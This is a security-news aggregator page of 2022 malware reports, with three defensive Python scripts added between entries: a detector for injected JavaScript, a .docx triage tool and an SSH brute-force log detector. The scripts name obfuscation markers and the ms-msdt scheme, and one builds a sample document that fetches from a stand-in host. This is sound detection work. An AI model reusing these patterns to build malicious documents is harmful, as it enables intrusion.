Researchers spotted a new variant of the Emotet bot that uses a new module to steal credit card information stored in the Chrome web browser. Proofpoint researchers reported a new wave of Emotet infections, in particular, a new variant is using a new info-stealing...Security Affairs
June 08, 2022
New Emotet Variant Stealing Users’ Credit Card Information from Google Chrome Full Text
Abstract
The notorious Emotet malware has turned to deploy a new module designed to siphon credit card information stored in the Chrome web browser. The credit card stealer, which exclusively singles out Chrome, has the ability to exfiltrate the collected information to different remote command-and-control (C2) servers, according to enterprise security company Proofpoint, which observed the component on June 6. The development comes amid a spike in Emotet activity since it was resurrected late last year following a 10-month-long hiatus in the wake of a law enforcement operation that took down its attack infrastructure in January 2021. Emotet, attributed to a threat actor known as TA542 (aka Mummy Spider or Gold Crestwood), is an advanced, self-propagating and modular trojan that's delivered via email campaigns and is used as a distributor for other payloads such as ransomware. As of April 2022, Emotet is still the most popular malware with a global impacThe Hacker News
June 08, 2022
Emotet malware now steals credit cards from Google Chrome users Full Text
Abstract
The Emotet botnet is now attempting to infect potential victims with a credit card stealer module designed to harvest credit card information stored in Google Chrome user profiles.BleepingComputer
June 07, 2022
New SVCReady malware loads from Word doc properties Full Text
Abstract
A previously unknown malware loader named SVCReady has been discovered in phishing attacks, featuring an unusual way of loading the malware from Word documents onto compromised machines.BleepingComputer
June 07, 2022
Qbot malware now uses Windows MSDT zero-day in phishing attacks Full Text
Abstract
A critical Windows zero-day vulnerability, known as Follina and still waiting for an official fix from Microsoft, is now being actively exploited in ongoing phishing attacks to infect recipients with Qbot malware.BleepingComputer
June 06, 2022
10 Most Prolific Banking Trojans Targeting Hundreds of Financial Apps with Over a Billion Users Full Text
Abstract
10 of the most prolific mobile banking trojans have set their eyes on 639 financial applications that are available on the Google Play Store and have been cumulatively downloaded over 1.01 billion times. Some of the most targeted apps include Walmart-backed PhonePe, Binance, Cash App, Garanti BBVA Mobile, La Banque Postale, Ma Banque, Caf - Mon Compte, Postepay, and BBVA México. These apps alone account for more than 260 million downloads from the official app marketplace. Of the 639 apps tracked, 121 are based in the U.S., followed by the U.K. (55), Italy (43), Turkey (34), Australia (33), France (31), Spain (29), and Portugal (27). "TeaBot is targeting 410 of the 639 applications tracked," mobile security company Zimperium said in a new analysis of Android threats during the first half of 2022. "Octo targets 324 of the 639 applications tracked and is the only one targeting popular, non-financial applications for credential theft." Aside from TeaBot (The Hacker News
June 04, 2022
SMSFactory Android malware sneakily subscribes to premium services Full Text
Abstract
Security researchers are warning of an Android malware named SMSFactory that adds unwanted costs to the phone bill by subscribing victims to premium services.BleepingComputer
June 03, 2022
Researchers Uncover Malware Controlling Thousands of Sites in Parrot TDS Network Full Text
Abstract
The Parrot traffic direction system (TDS) that came to light earlier this year has had a larger impact than previously thought, according to new research. Sucuri, which has been tracking the same campaign since February 2019 under the name "NDSW/NDSX," said that "the malware was one of the top infections" detected in 2021, accounting for more than 61,000 websites. Parrot TDS was documented in April 2022 by Czech cybersecurity company Avast, noting that the PHP script had ensnared web servers hosting more than 16,500 websites to act as a gateway for further attack campaigns. This involves appending a piece of malicious code to all JavaScript files on compromised web servers hosting content management systems (CMS) such as WordPress that are in turn said to be breached by taking advantage of weak login credentials and vulnerable plugins. Besides using different obfuscation tactics to conceal the code, the "injected JavaScript may also be found well indentThe Hacker News
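The Parrot TDS abstract above describes a mass injection: one obfuscated snippet appended to every JavaScript file on a compromised server. On a copy of the web root that leaves a simple fingerprint, many .js files whose endings are byte-for-byte identical while the files differ before that point. The clustering script below is an added example, not code from Sucuri or Avast; the sample files and the INJECTED placeholder are constructed and carry only typical obfuscation markers, not the real Parrot code.

```python
"""Cluster JavaScript files that end in the same appended code.

Added example; not code from Sucuri or Avast.  SAMPLE_FILES and INJECTED are
constructed placeholders, not the real Parrot TDS / NDSW snippet.
"""
import hashlib
import os
import re
from collections import defaultdict
from typing import Dict, List, Mapping

TAIL_BYTES = 256
MARKERS = re.compile(rb"eval\(|unescape\(|String\.fromCharCode|document\.write|atob\(")


def tail_fingerprint(data: bytes, n: int = TAIL_BYTES) -> str:
    """SHA-256 of the last n bytes, trailing whitespace ignored."""
    return hashlib.sha256(data.rstrip()[-n:]).hexdigest()


def common_suffix(blobs: List[bytes]) -> bytes:
    """Longest byte string every blob ends with; recovers the injected snippet."""
    limit = min(len(b) for b in blobs)
    n = 0
    while n < limit and all(b[-1 - n] == blobs[0][-1 - n] for b in blobs):
        n += 1
    return blobs[0][len(blobs[0]) - n:] if n else b""


def shared_tails(files: Mapping[str, bytes], min_files: int = 3) -> List[Dict[str, object]]:
    """Group files by tail fingerprint and describe each group of >= min_files."""
    groups: Dict[str, List[str]] = defaultdict(list)
    for path, data in files.items():
        groups[tail_fingerprint(data)].append(path)
    report = []
    for paths in groups.values():
        if len(paths) < min_files:
            continue
        blobs = [files[p].rstrip() for p in paths]
        suffix = common_suffix(blobs)
        report.append({
            "files": sorted(paths),
            "common_suffix_len": len(suffix),
            "marker_hits": len(MARKERS.findall(suffix)),
            # identical whole files are copies of one library, not an injection
            "exact_duplicates": all(len(b) == len(suffix) for b in blobs),
        })
    return sorted(report, key=lambda r: (-len(r["files"]), -r["common_suffix_len"]))


def load_js_tree(root: str) -> Dict[str, bytes]:
    """Read every .js file under root; point this at an offline copy of the web root."""
    out: Dict[str, bytes] = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".js"):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    out[path] = fh.read()
    return out


# Constructed placeholder: long enough that the 256-byte tail lies inside it.
INJECTED = (b"\n;(function(){var ndsw=true;eval(unescape('" + b"%64%6f%63" * 40
            + b"'));var s=String.fromCharCode(104,116,116,112);/*constructed placeholder*/})();\n")
SAMPLE_FILES: Dict[str, bytes] = {
    "wp-includes/js/a.js": b"function a(){return 1}" + INJECTED,
    "wp-content/plugins/x/b.js": b"var b=2;" + INJECTED,
    "wp-content/themes/t/c.js": b"console.log('c')" + INJECTED,
    "wp-includes/js/clean.js": b"/* clean */ " + b"x=1;" * 100,
}

if __name__ == "__main__":
    for group in shared_tails(SAMPLE_FILES):
        print(group)
```

A group with many files, a common suffix shorter than the files themselves, and marker hits above zero is the injection; the recovered suffix is also the string to grep the rest of the host for, including the "well indented" variant Sucuri mentions, which this tail check would only catch after whitespace normalisation.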
June 02, 2022
Top 10 Android banking trojans target apps with 1 billion downloads Full Text
Abstract
The ten most prolific Android mobile banking trojans target 639 financial applications that collectively have over one billion downloads on the Google Play Store.BleepingComputer
June 01, 2022
SideWinder hackers plant fake Android VPN app in Google Play Store Full Text
Abstract
Phishing campaigns attributed to an advanced threat actor called SideWinder involved a fake VPN app for Android devices published on Google Play Store along with a custom tool that filters victims for better targeting.BleepingComputer
May 30, 2022
Linux malware is on the rise—6 types of attacks to look for Full Text
Abstract
Security is weakest when sysadmins and developers race against deadlines. Opportunistic attackers exploit this "economy of attention", because developers under pressure often overlook security risks.CSO Online
May 30, 2022
Watch Out! Researchers Spot New Microsoft Office Zero-Day Exploit in the Wild Full Text
Abstract
Cybersecurity researchers are calling attention to a zero-day flaw in Microsoft Office that could be abused to achieve arbitrary code execution on affected Windows systems. The vulnerability came to light after an independent cybersecurity research team known as nao_sec uncovered a Word document ("05-2022-0438.doc") that was uploaded to VirusTotal from an IP address in Belarus. "It uses Word's external link to load the HTML and then uses the 'ms-msdt' scheme to execute PowerShell code," the researchers noted in a series of tweets last week. According to security researcher Kevin Beaumont, who dubbed the flaw "Follina," the maldoc leverages Word's remote template feature to fetch an HTML file from a server, which then makes use of the "ms-msdt://" URI scheme to run the malicious payload. The shortcoming has been so named because the malicious sample references 0438, which is the area code of Follina, a municipality in tThe Hacker News
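The Follina and Qbot entries above and the SVCReady entry further up both come down to structures inside the .docx container: a relationship that sends Word to an external target (the remote-template fetch whose HTML then abuses ms-msdt:), and document property values large enough to carry an encoded payload (the SVCReady trick of loading from document properties). The triage script below is an added example, not code from nao_sec, HP or BleepingComputer; it builds its sample document in memory, and the host name and the hex blob in it are made up.

```python
"""Offline triage of a .docx for external relationships and payload-sized
document properties.  Added example; not code from the Follina or SVCReady
write-ups.  The sample document, host name and hex blob are constructed."""
import io
import math
import re
import zipfile
import xml.etree.ElementTree as ET
from collections import Counter
from typing import Dict, List

HIGH_RISK_REL_TYPES = ("attachedTemplate", "oleObject", "frame")
HIGH_RISK_SCHEMES = ("ms-msdt:", "search-ms:")
HEX_RE = re.compile(r"[0-9A-Fa-f]+")
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def shannon_entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def external_relationships(z: zipfile.ZipFile) -> List[Dict[str, object]]:
    """Every TargetMode="External" relationship in any .rels part.  Remote
    templates normally sit in settings.xml.rels, but a relationship in
    document.xml.rels is resolved just the same, so all parts are scanned."""
    found = []
    for part in z.namelist():
        if not part.endswith(".rels"):
            continue
        for el in ET.fromstring(z.read(part)).iter():
            if not el.tag.endswith("}Relationship") or el.get("TargetMode") != "External":
                continue
            rel_type = el.get("Type", "").rsplit("/", 1)[-1]
            target = el.get("Target", "")
            found.append({"part": part, "type": rel_type, "target": target,
                          "high_risk": rel_type in HIGH_RISK_REL_TYPES
                          or target.lower().startswith(HIGH_RISK_SCHEMES)})
    return found


def suspicious_properties(z: zipfile.ZipFile, min_len: int = 64) -> List[Dict[str, object]]:
    """Property values that are long and look like hex, base64 or high-entropy data."""
    found = []
    for part in ("docProps/core.xml", "docProps/app.xml", "docProps/custom.xml"):
        if part not in z.namelist():
            continue
        root = ET.fromstring(z.read(part))
        if part.endswith("custom.xml"):  # <property name=..><vt:lpwstr>value</vt:lpwstr></property>
            items = [(el.get("name", "?"), "".join(el.itertext())) for el in root.iter()
                     if el.tag.endswith("}property")]
        else:  # core/app: one leaf element per property
            items = [(el.tag.rsplit("}", 1)[-1], el.text or "") for el in root.iter()
                     if el is not root and len(el) == 0]
        for name, value in items:
            value = value.strip()
            if len(value) >= min_len and (HEX_RE.fullmatch(value) or B64_RE.fullmatch(value)
                                          or shannon_entropy(value) > 4.5):
                found.append({"part": part, "name": name, "length": len(value)})
    return found


def triage_docx(data: bytes) -> Dict[str, list]:
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return {"external_relationships": external_relationships(z),
                "suspicious_properties": suspicious_properties(z)}


def build_sample_docx() -> bytes:
    """Constructed sample: one external oleObject relationship and one custom
    property holding a 180-character hex blob (placeholder, not real code)."""
    rels = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
            '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
            'Target="http://template-host.invalid/stage.html" TargetMode="External"/>'
            '</Relationships>')
    blob = "4d5a90000300000004000000ffff0000b800" * 5
    custom = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
              '<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" '
              'xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">'
              '<property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="2" name="Company"><vt:lpwstr>Example Ltd</vt:lpwstr></property>'
              '<property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Comments"><vt:lpwstr>' + blob + '</vt:lpwstr></property>'
              '</Properties>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/_rels/document.xml.rels", rels)
        z.writestr("docProps/custom.xml", custom)
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_docx(build_sample_docx()))
```

An external relationship is not proof by itself (legitimate templates on a corporate share look the same), but an external http(s) target in an oleObject or attachedTemplate relationship is the precondition for the Follina chain; the ms-msdt: indicator itself lives in the fetched HTML, so that file, not the document, is where to look for it next.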
May 30, 2022
EnemyBot malware adds new exploits to target CMS servers and Android devices Full Text
Abstract
Operators of the EnemyBot botnet are expanding their list of potential targets by adding exploits for recently disclosed critical flaws in VMware, F5 BIG-IP, and Android systems...Security Affairs
May 29, 2022
EnemyBot malware adds exploits for critical VMware, F5 BIG-IP flaws Full Text
Abstract
EnemyBot, a botnet based on code from multiple malware pieces, is expanding its reach by quickly adding exploits for recently disclosed critical vulnerabilities in web servers, content management systems, IoT, and Android devices.BleepingComputer
May 28, 2022
New Windows Subsystem for Linux malware steals browser auth cookies Full Text
Abstract
Hackers are showing an increased interest in the Windows Subsystem for Linux (WSL) as an attack surface as they build new malware, the more advanced samples being suitable for espionage and downloading additional malicious modules.BleepingComputer
May 27, 2022
ERMAC 2.0 Android Banking Trojan targets over 400 apps Full Text
Abstract
Version 2.0 of the ERMAC Android banking trojan expands the number of targeted applications from 378 to 467, from which it steals account...Security Affairs
May 26, 2022
Experts Warn of Rise in ChromeLoader Malware Hijacking Users’ Browsers Full Text
Abstract
A malvertising threat is witnessing a new surge in activity since its emergence earlier this year. Dubbed ChromeLoader, the malware is a "pervasive and persistent browser hijacker that modifies its victims' browser settings and redirects user traffic to advertisement websites," Aedan Russell of Red Canary said in a new report. ChromeLoader is a rogue Chrome browser extension and is typically distributed in the form of ISO files via pay-per-install sites and baited social media posts that advertise QR codes to cracked video games and pirated movies. While it primarily functions by hijacking user search queries to Google, Yahoo, and Bing and redirecting traffic to an advertising site, it's also notable for its use of PowerShell to inject itself into the browser and get the extension added. The malware, also known as Choziosi Loader, was first documented by G DATA earlier this February. "For now the only purpose is getting revenue via unsolicited advertiThe Hacker News
May 26, 2022
New ERMAC 2.0 Android malware steals accounts, wallets from 467 apps Full Text
Abstract
The ERMAC Android banking trojan has released version 2.0, increasing the number of applications targeted from 378 to 467, covering a much wider range of apps to steal account credentials and crypto wallets.BleepingComputer
May 25, 2022
New ChromeLoader malware surge threatens browsers worldwide Full Text
Abstract
The ChromeLoader malware is seeing an uptick in detections this month, following a relatively stable operation volume since the start of the year, which means that the malvertiser is now becoming a widespread threat.BleepingComputer
May 25, 2022
Windows Exploits Used to Target Infosec Community Full Text
Abstract
Cyble researchers spotted a malware campaign targeting the infosec community via fake PoC exploit code for an RPC Runtime RCE flaw. The fake exploit was distributed via GitHub. By attacking the infosec community, the attackers are probably trying to gain access to vulnerability research or steal other p ... Read MoreCyware Alerts - Hacker News
May 25, 2022
Credit Card Stealer Targets PsiGate Payment Gateway Software Full Text
Abstract
The malware injection leverages the #psigate_cc_number, #psigate_expiration, #psigate_expiration_yr and #psigate_cc_cid fields (among others) to harvest customer’s payment data and details whenever the text fields are submitted on the checkout page.Sucuri
May 25, 2022
BPFDoor malware uses Solaris vulnerability to get root privileges Full Text
Abstract
New research into the inner workings of the stealthy BPFdoor malware for Linux and Solaris reveals that the threat actor behind it leveraged an old vulnerability to achieve persistence on targeted systems.BleepingComputer
May 24, 2022
Nation-state malware could become a commodity on dark web soon, Interpol warns Full Text
Abstract
In the ongoing conflict between Russia and Ukraine, the malware developed by both nation-state actors and non state actors represents a serious risk for critical infrastructure and organizations worldwide.Security Affairs
May 24, 2022
Microsoft: Credit card stealers are getting much stealthier Full Text
Abstract
Microsoft's security researchers have observed a worrying trend in credit card skimming, where threat actors employ more advanced techniques to hide their malicious info-stealing code.BleepingComputer
May 24, 2022
Malware Analysis: Trickbot Full Text
Abstract
In this day and age, we are no longer dealing with roughly pieced-together, homebrew viruses. Malware is an industry, and professional developers exchange code, whether by stealing it or through deliberate collaboration. Attacks are multi-layered these days, with diverse sophisticated software components taking over different jobs along the attack chain, from initial compromise to ultimate data exfiltration or encryption. The specific tools for each stage are highly specialized and can often be rented as a service, including customer support and subscription models for professional (ab)use. Obviously, this has greatly increased both the availability and the potential effectiveness and impact of malware. Sound scary? Well, it does, but the apparent professionalization actually has some good sides too. One factor is that certain reused modules commonly found in malware can be used to identify, track, and analyze professional attack software. Ultimately this means thatThe Hacker News
May 23, 2022
Fake Windows exploits target infosec community with Cobalt Strike Full Text
Abstract
A threat actor targeted security researchers with fake Windows proof-of-concept exploits that infected devices with the Cobalt Strike backdoor.BleepingComputer
May 23, 2022
Mirai Malware for Linux Double Down on Stronger Chips Full Text
Abstract
Popular for compromising internet-connected devices and conducting distributed denial of service (DDoS) attacks, Mirai malware variants have been known to compromise devices that run on Linux builds.Crowdstrike
May 22, 2022
PDF smuggles Microsoft Word doc to drop Snake Keylogger malware Full Text
Abstract
Threat analysts have discovered a recent malware distribution campaign using PDF attachments to smuggle malicious Word documents that infect users with malware.BleepingComputer
May 21, 2022
Malicious PyPI package opens backdoors on Windows, Linux, and Macs Full Text
Abstract
Yet another malicious Python package has been spotted in the PyPI registry performing supply chain attacks to drop Cobalt Strike beacons and backdoors on Windows, Linux, and macOS systems.BleepingComputer
May 20, 2022
Researchers Find Backdoor in School Management Plugin for WordPress Full Text
Abstract
Multiple versions of a WordPress plugin by the name of "School Management Pro" harbored a backdoor that could grant an adversary complete control over vulnerable websites. The issue, spotted in premium versions before 9.9.7, has been assigned the CVE identifier CVE-2022-1609 and is rated 10 out of 10 for severity. The backdoor, which is believed to have existed since version 8.9, enables "an unauthenticated attacker to execute arbitrary PHP code on sites with the plugin installed," Jetpack's Harald Eilertsen said in a Friday write-up. School Management, developed by an India-based company called Weblizar, is billed as a WordPress add-on to "manage complete school operation." It also claims more than 340,000 customers of its premium and free WordPress themes and plugins. The WordPress security company noted that it uncovered the implant on May 4 after it was alerted to the presence of heavily obfuscated code in the license-checking code of tThe Hacker News
May 20, 2022
Backdoor baked into premium school management plugin for WordPress Full Text
Abstract
Security researchers have discovered a backdoor in a premium WordPress plugin built as a complete management solution for schools. The malicious code enables a threat actor to execute PHP code without authenticating.BleepingComputer
May 20, 2022
Microsoft Warns Rise in XorDdos Malware Targeting Linux Devices Full Text
Abstract
A Linux botnet malware known as XorDdos has witnessed a 254% surge in activity over the last six months, according to latest research from Microsoft. The trojan, so named for carrying out denial-of-service attacks on Linux systems and its use of XOR-based encryption for communications with its command-and-control (C2) server, is known to have been active since at least 2014. "XorDdos' modular nature provides attackers with a versatile trojan capable of infecting a variety of Linux system architectures," Ratnesh Pandey, Yevgeny Kulakov, and Jonathan Bar Or of the Microsoft 365 Defender Research Team said in an exhaustive deep-dive of the malware. "Its SSH brute-force attacks are a relatively simple yet effective technique for gaining root access over a number of potential targets." Remote control over vulnerable IoT and other internet-connected devices is gained by means of secure shell (SSH) brute-force attacks, enabling the malware to form a botnetThe Hacker News
May 20, 2022
Dridex Infection Chain Case Studies Full Text
Abstract
Recently, during December 2021, Unit 42 researchers received various Dridex samples, which were exploiting XLL and XLM 4.0 in combination with Discord and OneDrive to download the final payload.Palo Alto Networks
May 19, 2022
Microsoft detects massive surge in Linux XorDDoS malware activity Full Text
Abstract
A stealthy and modular malware used to hack into Linux devices and build a DDoS botnet has seen a massive 254% increase in activity during the last six months, as Microsoft revealed today.BleepingComputer
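Both XorDdos entries above describe the same initial access: SSH password brute force that eventually lands a root login. On the host that pattern is a burst of "Failed password" lines from one source in auth.log followed by "Accepted password". The detector below is an added example, not code from Microsoft's report; the log lines are constructed, and because syslog timestamps carry no year the year is an assumption set in LOG_YEAR.

```python
"""Detect SSH password brute force, and a success that follows it, in auth.log.

Added example; not code from Microsoft's XorDdos report.  SAMPLE_LOG is
constructed; LOG_YEAR is an assumption because syslog omits the year.
"""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, Iterable, List, Optional

LOG_YEAR = 2022  # assumption: syslog timestamps carry no year

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

SAMPLE_LOG = """\
May 20 03:14:01 web1 sshd[2201]: Failed password for root from 198.51.100.7 port 40122 ssh2
May 20 03:14:02 web1 sshd[2203]: Failed password for root from 198.51.100.7 port 40130 ssh2
May 20 03:14:04 web1 sshd[2205]: Failed password for invalid user admin from 198.51.100.7 port 40141 ssh2
May 20 03:14:05 web1 sshd[2207]: Failed password for invalid user oracle from 198.51.100.7 port 40150 ssh2
May 20 03:14:07 web1 sshd[2209]: Failed password for root from 198.51.100.7 port 40162 ssh2
May 20 03:14:09 web1 sshd[2211]: Accepted password for root from 198.51.100.7 port 40170 ssh2
May 20 03:20:33 web1 sshd[2300]: Failed password for alice from 192.0.2.10 port 50001 ssh2
May 20 03:21:10 web1 sshd[2302]: Accepted publickey for alice from 192.0.2.10 port 50002 ssh2
"""


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Extract timestamp, outcome, auth method, user and source IP; None for other lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{LOG_YEAR} {' '.join(m['ts'].split())}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}


def detect(lines: Iterable[str], threshold: int = 5, window_s: int = 60) -> List[Dict[str, object]]:
    """Sliding-window rule: >= threshold failures from one IP within window_s
    raises a brute_force alert; a later Accepted from an IP already flagged,
    while it still has failures inside the window, raises a higher-severity
    success_after_brute_force alert (the XorDdos outcome)."""
    failures: Dict[str, Deque[datetime]] = defaultdict(deque)
    flagged: Dict[str, datetime] = {}
    alerts: List[Dict[str, object]] = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        ip, ts = ev["ip"], ev["ts"]
        q = failures[ip]
        while q and (ts - q[0]).total_seconds() > window_s:
            q.popleft()  # expire failures outside the window
        if ev["result"] == "Failed":
            q.append(ts)
            if len(q) >= threshold and ip not in flagged:
                flagged[ip] = ts
                alerts.append({"kind": "brute_force", "ip": ip, "failures": len(q), "at": ts})
        elif ip in flagged and q:
            alerts.append({"kind": "success_after_brute_force", "ip": ip, "user": ev["user"],
                           "method": ev["method"], "at": ts})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

A single typo'd password followed by a publickey login (the alice lines) stays silent, which is the point of requiring the threshold before the success rule fires; tune threshold and window_s to the host's normal failure rate, and remember that a botnet spreading the attempts over many source IPs needs a per-user rather than per-IP key.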
May 18, 2022
UpdateAgent Updated with New Malware Dropper Full Text
Abstract
A new variant of UpdateAgent macOS malware was tracked, indicating ongoing attempts on the part of its authors to upgrade its functionalities. The new dropper is a Swift-based executable, which masquerades as Mach-O binaries such as PDFCreator and ActiveDirectory. It is recommended to stay a ... Read MoreCyware Alerts - Hacker News
May 18, 2022
New SYK Crypter Propagates via Discord Full Text
Abstract
Threat actors are abusing Discord’s CDN with the new SYK crypter designed to dodge behavior-based security controls while opening a gate to different malware families, such as AsyncRAT, NanoCore RAT, and more. The increasing number of people using the community chat platform has continued attractin ... Read MoreCyware Alerts - Hacker News
May 18, 2022
Microsoft warns of the rise of cryware targeting hot wallets Full Text
Abstract
Microsoft researchers warn of the rising threat of cryware, malicious software used to steal information and funds from non-custodial cryptocurrency wallets, also known as hot wallets...Security Affairs
May 18, 2022
Experts spotted a new variant of UpdateAgent macOS malware dropper written in Swift Full Text
Abstract
Researchers from the Jamf Threat Labs team uncovered a new variant of the UpdateAgent macOS malware dropper employed in attacks in the wild. The new version...Security Affairs
May 18, 2022
Microsoft Warns of “Cryware” Info-Stealing Malware Targeting Crypto Wallets Full Text
Abstract
Microsoft is warning of an emerging threat targeting internet-connected cryptocurrency wallets, signaling a departure in the use of digital coins in cyberattacks. The tech giant dubbed the new threat "cryware," with the attacks resulting in the irreversible theft of virtual currencies by means of fraudulent transfers to an adversary-controlled wallet. "Cryware are information stealers that collect and exfiltrate data directly from non-custodial cryptocurrency wallets, also known as hot wallets," Berman Enconado and Laurie Kirk of the Microsoft 365 Defender Research Team said in a new report. "Because hot wallets, unlike custodial wallets, are stored locally on a device and provide easier access to cryptographic keys needed to perform transactions, more and more threats are targeting them." Attacks of this kind are not theoretical. Earlier this year, Kaspersky disclosed a financially-motivated campaign staged by the North Korea-based Lazarus GrThe Hacker News
May 17, 2022
UpdateAgent Returns with New macOS Malware Dropper Written in Swift Full Text
Abstract
A new variant of the macOS malware tracked as UpdateAgent has been spotted in the wild, indicating ongoing attempts on the part of its authors to upgrade its functionalities. "Perhaps one of the most identifiable features of the malware is that it relies on the AWS infrastructure to host its various payloads and perform its infection status updates to the server," researchers from Jamf Threat Labs said in a report. UpdateAgent, first detected in late 2020, has since evolved into a malware dropper, facilitating the distribution of second-stage payloads such as adware while also bypassing macOS Gatekeeper protections. The newly discovered Swift-based dropper masquerades as Mach-O binaries named "PDFCreator" and "ActiveDirectory" that, upon execution, establish a connection to a remote server and retrieve a bash script to be executed. "The primary difference [between the two executables] is that it reaches out to a different URL from whThe Hacker News
May 17, 2022
Over 200 Apps on Play Store were distributing Facestealer info-stealer Full Text
Abstract
Trend Micro researchers spotted over 200 Android apps on the Play Store distributing spyware called Facestealer, used to steal sensitive data...Security Affairs
May 17, 2022
Custom PowerShell RAT targets German users using the Ukraine crisis as bait Full Text
Abstract
Malwarebytes researchers uncovered a campaign in which a threat actor uses a custom PowerShell RAT against German users, with the Ukraine crisis as bait, to gather intelligence. The threat...Security Affairs
May 17, 2022
Over 200 Apps on Play Store Caught Spying on Android Users Using Facestealer Full Text
Abstract
More than 200 Android apps masquerading as fitness, photo editing, and puzzle apps have been observed distributing spyware called Facestealer to siphon user credentials and other valuable information. "Similar to Joker, another piece of mobile malware, Facestealer changes its code frequently, thus spawning many variants," Trend Micro analysts Cifer Fang, Ford Quin, and Zhengyu Dong said in a new report. "Since its discovery, the spyware has continuously beleaguered Google Play." Facestealer, first documented by Doctor Web in July 2021, refers to a group of fraudulent apps that invade the official app marketplace for Android with the goal of plundering sensitive data such as Facebook login credentials. Of the 200 apps, 42 are VPN services, followed by a camera (20) and photo editing applications (13). In addition to harvesting credentials, the apps are also designed to collect Facebook cookies and personally identifiable information associated with a vicThe Hacker News
May 16, 2022
Fake Mobile Apps Steal Facebook Credentials, Cryptocurrency-Related Keys Full Text
Abstract
Similar to Joker, another piece of mobile malware, Facestealer changes its code frequently, thus spawning many variants. Since its discovery, the spyware has continuously beleaguered Google Play.Trend Micro
May 16, 2022
Researchers Warn of “Eternity Project” Malware Service Being Sold via Telegram Full Text
Abstract
An unidentified threat actor has been linked to an actively in-development malware toolkit called the "Eternity Project" that lets professional and amateur cybercriminals buy stealers, clippers, worms, miners, ransomware, and a distributed denial-of-service (DDoS) bot. What makes this malware-as-a-service (MaaS) stand out is that besides using a Telegram channel to communicate updates about the latest features, it also employs a Telegram Bot that enables the purchasers to build the binary. "The [threat actors] provide an option in the Telegram channel to customize the binary features, which provides an effective way to build binaries without any dependencies," researchers from Cyble said in a report published last week. Each of the modules can be leased separately and provides paid access to a wide variety of functions - Eternity Stealer ($260 for an annual subscription) - Siphon passwords, cookies, credit cards, browser cryptocurrency extensions, cryptThe Hacker News
May 15, 2022
Eternity Project - A New Swiss Army Knife for Threat Actors Full Text
Abstract
Threat actors are using Tor and Telegram to spread the Eternity malware, which is customizable with modules including a stealer, clipper, worm, miner, and ransomware. It can pilfer information from cryptocurrency extensions or even cold wallets. It also targets password managers, VPN clients, messenge ... Read MoreCyware Alerts - Hacker News
May 13, 2022
Fake Binance NFT Mystery Box bots steal victim’s crypto wallets Full Text
Abstract
A new RedLine malware distribution campaign promotes fake Binance NFT mystery box bots on YouTube to lure people into infecting themselves with the information-stealing malware from GitHub repositories.BleepingComputer
May 12, 2022
Malware Builder Leverages Discord Webhooks Full Text
Abstract
Researchers discovered a simple malware builder designed to steal credentials and exfiltrate them to Discord webhooks.Threatpost
May 12, 2022
Eternity malware kit offers stealer, miner, worm, ransomware tools Full Text
Abstract
Threat actors have launched the 'Eternity Project,' a new malware-as-a-service where threat actors can purchase a malware toolkit that can be customized with different modules depending on the attack being conducted.BleepingComputer
May 12, 2022
BPFdoor: Stealthy Linux malware bypasses firewalls for remote access Full Text
Abstract
A recently discovered backdoor malware called BPFdoor has been stealthily targeting Linux and Solaris systems without being noticed for more than five years.BleepingComputer
May 11, 2022
Hackers Deploy IceApple Exploitation Framework on Hacked MS Exchange Servers Full Text
Abstract
Researchers have detailed a previously undocumented .NET-based post-exploitation framework called IceApple that has been deployed on Microsoft Exchange server instances to facilitate reconnaissance and data exfiltration. "Suspected to be the work of a state-nexus adversary, IceApple remains under active development, with 18 modules observed in use across a number of enterprise environments, as of May 2022," CrowdStrike said in a Wednesday report. The cybersecurity firm, which discovered the sophisticated malware in late 2021, noted its presence in multiple victim networks and in geographically distinct locations. Targeted victims span a wide range of sectors, including technology, academic, and government entities. A post-exploitation toolset, as the name implies, is not used to provide initial access, but is rather employed to carry out follow-on attacks after having already compromised the hosts in question. IceApple is notable for the fact that it's an in-memoThe Hacker News
May 11, 2022
Researchers Warn of Nerbian RAT Targeting Entities in Italy, Spain, and the U.K Full Text
Abstract
